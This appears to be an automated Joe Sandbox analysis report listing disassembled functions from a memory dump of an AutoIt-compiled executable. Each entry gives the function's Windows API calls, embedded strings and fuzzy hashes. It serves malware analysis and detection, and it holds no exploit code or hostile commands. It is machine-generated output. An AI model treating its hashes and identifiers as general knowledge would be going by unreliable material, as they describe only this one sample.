Instruction Fuzzy Hash: 8881913100430A9BDB15DF14C885FAA7BD8FF88714F1885AAFD899A196EB30DD45CBB1

Function 00D7E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00D7E549

Strings

REGEXP=, xrefs: 00D7E55E
[HANDLE:, xrefs: 00D7E555
CLASSNAME=, xrefs: 00D7E586
ALL, xrefs: 00D7E5DD
[CLASS:, xrefs: 00D7E599
HANDLE=, xrefs: 00D7E542
LAST, xrefs: 00D7E50E
[ACTIVE, xrefs: 00D7E536
ACTIVE, xrefs: 00D7E524
[ALL, xrefs: 00D7E5EF
[LAST, xrefs: 00D7E5F6
[REGEXPTITLE:, xrefs: 00D7E571

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 929892ec6b7aa4060a4d4f47faa1569c4d3095371f4a54e1125265fa4890f99c
Instruction ID: 8b7e5270e5b8d7dd67a900c104e1e1f4e5769a1cce7c9e5917eb0556f5ef4c8d
Opcode Fuzzy Hash: 929892ec6b7aa4060a4d4f47faa1569c4d3095371f4a54e1125265fa4890f99c
Instruction Fuzzy Hash: 9831AD31A4420DABDB14EB50DD53EBE73A49F29704F208564F645B10D6FFA1AF08CA71

Function 00D7F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00D7F8AB
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00D7F8BD
SetWindowTextW.USER32(?,?), ref: 00D7F8D4
GetDlgItem.USER32(?,000003EA), ref: 00D7F8E9
SetWindowTextW.USER32(00000000,?), ref: 00D7F8EF
GetDlgItem.USER32(?,000003E9), ref: 00D7F8FF
SetWindowTextW.USER32(00000000,?), ref: 00D7F905
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00D7F926
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00D7F940
GetWindowRect.USER32(?,?), ref: 00D7F949
SetWindowTextW.USER32(?,?), ref: 00D7F9B4
GetDesktopWindow.USER32 ref: 00D7F9BA
GetWindowRect.USER32(00000000), ref: 00D7F9C1
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00D7FA0D
GetClientRect.USER32(?,?), ref: 00D7FA1A
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00D7FA3F
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00D7FA6A

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: a59b48e5707edb858b6c666e008f2d492e6acfb28f8113d70a2214119285b2d5
Instruction ID: f52b0f1674929c971e18b2afc8f6ddbcc218790cf9318cc032dbc5d7ab7cb010
Opcode Fuzzy Hash: a59b48e5707edb858b6c666e008f2d492e6acfb28f8113d70a2214119285b2d5
Instruction Fuzzy Hash: 13511E7190070AAFDB209FA8CD85F6EBBF5FF04704F004529E69AE26A0D774A944CF60

Function 00D901E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00D9026A
_wcschr.LIBCMT ref: 00D90278
_wcscpy.LIBCMT ref: 00D9028F
_wcscat.LIBCMT ref: 00D9029E
_wcscat.LIBCMT ref: 00D902BC
_wcscpy.LIBCMT ref: 00D902DD
__wsplitpath.LIBCMT ref: 00D903BA
_wcscpy.LIBCMT ref: 00D903DF
_wcscpy.LIBCMT ref: 00D903F1
_wcscpy.LIBCMT ref: 00D90406
_wcscat.LIBCMT ref: 00D9041B
_wcscat.LIBCMT ref: 00D9042D
_wcscat.LIBCMT ref: 00D90442

Part of subcall function 00D8C890: _wcscmp.LIBCMT ref: 00D8C92A
Part of subcall function 00D8C890: __wsplitpath.LIBCMT ref: 00D8C96F
Part of subcall function 00D8C890: _wcscpy.LIBCMT ref: 00D8C982
Part of subcall function 00D8C890: _wcscat.LIBCMT ref: 00D8C995
Part of subcall function 00D8C890: __wsplitpath.LIBCMT ref: 00D8C9BA
Part of subcall function 00D8C890: _wcscat.LIBCMT ref: 00D8C9D0
Part of subcall function 00D8C890: _wcscat.LIBCMT ref: 00D8C9E3

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00D90235

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: a81b538eed48da2dca33e7c5263d65d5aa880cd22a45ab796857924f54339151
Instruction ID: f4665601d5f8ee0f60072746ff4298097be39c458ad56497cc6fa3bf1ff3b9a6
Opcode Fuzzy Hash: a81b538eed48da2dca33e7c5263d65d5aa880cd22a45ab796857924f54339151
Instruction Fuzzy Hash: C9919271504705AFCB20EB64D855F9EB7E9EF88310F08485EF9599B251EB30EA48CB72

Function 00DACC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DACD0B
DestroyWindow.USER32(00000000,?), ref: 00DACD83

Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DACE04
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DACE26
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DACE35
DestroyWindow.USER32(?), ref: 00DACE52
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D40000,00000000), ref: 00DACE85
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DACEA4
GetDesktopWindow.USER32 ref: 00DACEB9
GetWindowRect.USER32(00000000), ref: 00DACEC0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DACED2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DACEEA

Part of subcall function 00D5B155: GetWindowLongW.USER32(?,000000EB), ref: 00D5B166

Strings

tooltips_class32, xrefs: 00DACDFD, 00DACE7E
0, xrefs: 00DACD2B

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 9c8be18257607fbcf826f92e64343eb3ba9dd4d9f928fe50eefb86ce8f2d6804
Instruction ID: befcc818cd07dd498922cda1e8e8d33df2433553a7b2f9424b532fa9536c82ed
Opcode Fuzzy Hash: 9c8be18257607fbcf826f92e64343eb3ba9dd4d9f928fe50eefb86ce8f2d6804
Instruction Fuzzy Hash: 8371DD7115030AAFD724CF28CC45FA63BE5EB89714F48452CF9859B2A1C731EA45CB71

Function 00D8B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00D8B46D
VariantCopy.OLEAUT32(?,?), ref: 00D8B476
VariantClear.OLEAUT32(?), ref: 00D8B482
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00D8B561
__swprintf.LIBCMT ref: 00D8B591
VarR8FromDec.OLEAUT32(?,?), ref: 00D8B5BD
VariantInit.OLEAUT32(?), ref: 00D8B63F
SysFreeString.OLEAUT32(00000016), ref: 00D8B6D1
VariantClear.OLEAUT32(?), ref: 00D8B727
VariantClear.OLEAUT32(?), ref: 00D8B736
VariantInit.OLEAUT32(00000000), ref: 00D8B772

Strings

Default, xrefs: 00D8B615
%4d%02d%02d%02d%02d%02d, xrefs: 00D8B58B

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 7820f2b99791bfb136103bfb6b138469fd67a22ad8637783660a9d91da936721
Instruction ID: 85a3405a743942c3685d50e96b326f8bf608dfb2e2a7319a077b213628763ba0
Opcode Fuzzy Hash: 7820f2b99791bfb136103bfb6b138469fd67a22ad8637783660a9d91da936721
Instruction Fuzzy Hash: E7C10131A04616EBCB10EF69C886B7AB7B4FF05320F188466E445DB692DB74EC44DBB0

Function 00DA6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DA6FF9
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DA7044

Strings

GETSELECTED, xrefs: 00DA713C
CHECK, xrefs: 00DA7064
GETTEXT, xrefs: 00DA717F
GETTOTALCOUNT, xrefs: 00DA7027
EXPAND, xrefs: 00DA70DE
SELECT, xrefs: 00DA71DD
ISCHECKED, xrefs: 00DA71AF
GETITEMCOUNT, xrefs: 00DA710E
COLLAPSE, xrefs: 00DA708A
EXISTS, xrefs: 00DA70AD
UNCHECK, xrefs: 00DA7208

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 334888be85eacc64b87e9a5eb6504a5a8773952f8c370d9e259123ed93614422
Instruction ID: c4ea4b8b3eea53bf37f529917032a392344a29441f05c441b6c2a6ada23d55f6
Opcode Fuzzy Hash: 334888be85eacc64b87e9a5eb6504a5a8773952f8c370d9e259123ed93614422
Instruction Fuzzy Hash: 27915F742087019FCB14EF14C851A6EB7A2EF95354F048869FC965B392DB31ED4ACBB1

Function 00DAE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DAE3BB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DABCBF), ref: 00DAE417
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DAE457
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DAE49C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DAE4D3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00DABCBF), ref: 00DAE4DF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DAE4EF
DestroyCursor.USER32(?), ref: 00DAE4FE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DAE51B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DAE527

Part of subcall function 00D61BC7: __wcsicmp_l.LIBCMT ref: 00D61C50

Strings

.dll, xrefs: 00DAE374
.exe, xrefs: 00DAE351
.icl, xrefs: 00DAE331

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 3907162815-1154884017
Opcode ID: abbbd977a32899dca2fab3bf342ad33eafbef32f20ac628f0ad31275f0c9aed7
Instruction ID: 6d4630aa244b61d5ea76fbd564829ee4fab117517b0e235f4db711b4e39c3c8d
Opcode Fuzzy Hash: abbbd977a32899dca2fab3bf342ad33eafbef32f20ac628f0ad31275f0c9aed7
Instruction Fuzzy Hash: FE61BB7150061ABFEB14DB64CC86FAA77ACAB0A710F148215F915E71D1EBB4D980CBB0

Function 00D90E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00D90EFF
SystemTimeToFileTime.KERNEL32(?,?), ref: 00D90F0F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D90F1B
__wsplitpath.LIBCMT ref: 00D90F79
_wcscat.LIBCMT ref: 00D90F91
_wcscat.LIBCMT ref: 00D90FA3
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00D90FB8
SetCurrentDirectoryW.KERNEL32(?), ref: 00D90FCC
SetCurrentDirectoryW.KERNEL32(?), ref: 00D90FFE
SetCurrentDirectoryW.KERNEL32(?), ref: 00D9101F
_wcscpy.LIBCMT ref: 00D9102B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00D9106A

Strings

*.*, xrefs: 00D91025

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 3c24cc3cb9999c91a025d50df37a9f558a0119809fdc94347d82111c4fd5f52c
Instruction ID: a1f00a7f6c2fd038cce712cf1b923968093230bd36df45956c8baead7a5983c8
Opcode Fuzzy Hash: 3c24cc3cb9999c91a025d50df37a9f558a0119809fdc94347d82111c4fd5f52c
Instruction Fuzzy Hash: 67615DB65043469FCB10EF20C84599EB7E8FF89310F04891AF999D7251EB31E945CBB2

Function 00D8DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

CharLowerBuffW.USER32(?,?), ref: 00D8DB26
GetDriveTypeW.KERNEL32 ref: 00D8DB73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D8DBBB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D8DBF2
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D8DC20

Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9

Strings

type cdaudio alias cd wait, xrefs: 00D8DB9E
wait, xrefs: 00D8DBDD
open , xrefs: 00D8DB82
open, xrefs: 00D8DB4D
closed, xrefs: 00D8DB3A, 00D8DB43
close cd wait, xrefs: 00D8DC0B
set cd door , xrefs: 00D8DBC1
close, xrefs: 00D8DB2C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 96abaec59c1ebe75ed9f4f25822dc8540068783135e648290794ed385e812c52
Instruction ID: 26ac6ca36337d0b9f6c4af14bdc5a2db7efdd093303824b7c2a7976d4e6e3315
Opcode Fuzzy Hash: 96abaec59c1ebe75ed9f4f25822dc8540068783135e648290794ed385e812c52
Instruction Fuzzy Hash: 28514A711083059FC700EF10C89186AB7F9EF88758F55896CF89A972A1DB31EE09CBB1

Function 00D83110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DB4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00D83145
LoadStringW.USER32(00000000,?,00DB4085,00000016), ref: 00D8314E

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00DB4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00D83170
LoadStringW.USER32(00000000,?,00DB4085,00000016), ref: 00D83173
__swprintf.LIBCMT ref: 00D831B3
__swprintf.LIBCMT ref: 00D831C5
_wprintf.LIBCMT ref: 00D8326C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D83283

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00D83267
Error: , xrefs: 00D8323C
Line %d:, xrefs: 00D831AD
^ ERROR, xrefs: 00D83216
Line %d (File "%s"):, xrefs: 00D831BF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 38b3de5f81735fdc326efe49231e4ec5dd5c8729af89b5b4bc53af6acc2e8422
Instruction ID: 38fc58ad6449fcda9781885758323e539f3c8e76eb6e61f368b2e337aa12b0e3
Opcode Fuzzy Hash: 38b3de5f81735fdc326efe49231e4ec5dd5c8729af89b5b4bc53af6acc2e8422
Instruction Fuzzy Hash: AA411D72940209ABCB14FBA4DD97EEEB779EF14B00F104065B205B20A2EA756F08CB71

Function 00D8D950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00D8D96C
__swprintf.LIBCMT ref: 00D8D98E
CreateDirectoryW.KERNEL32(?,00000000), ref: 00D8D9CB
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00D8D9F0
_memset.LIBCMT ref: 00D8DA0F
_wcsncpy.LIBCMT ref: 00D8DA4B
DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00D8DA80
CloseHandle.KERNEL32(00000000), ref: 00D8DA8B
RemoveDirectoryW.KERNEL32(?), ref: 00D8DA94
CloseHandle.KERNEL32(00000000), ref: 00D8DA9E

Strings

:, xrefs: 00D8D9AF
\??\%s, xrefs: 00D8D988
\, xrefs: 00D8D9A4

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 74ca70e31db830af3dd8206691653e685e5d9d16592f27b71a0fc963f7c57468
Instruction ID: 1cb3b99a321eda1ff49f9646312ee416dec7b309e4773fa2995c45010f34f9ef
Opcode Fuzzy Hash: 74ca70e31db830af3dd8206691653e685e5d9d16592f27b71a0fc963f7c57468
Instruction Fuzzy Hash: 5C31A672600209BBDB20EFA4DC49FEA77BDEF84700F1481A5F559D61A0E770DA458BB1

Function 00DAE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00DABD04,?,?), ref: 00DAE564
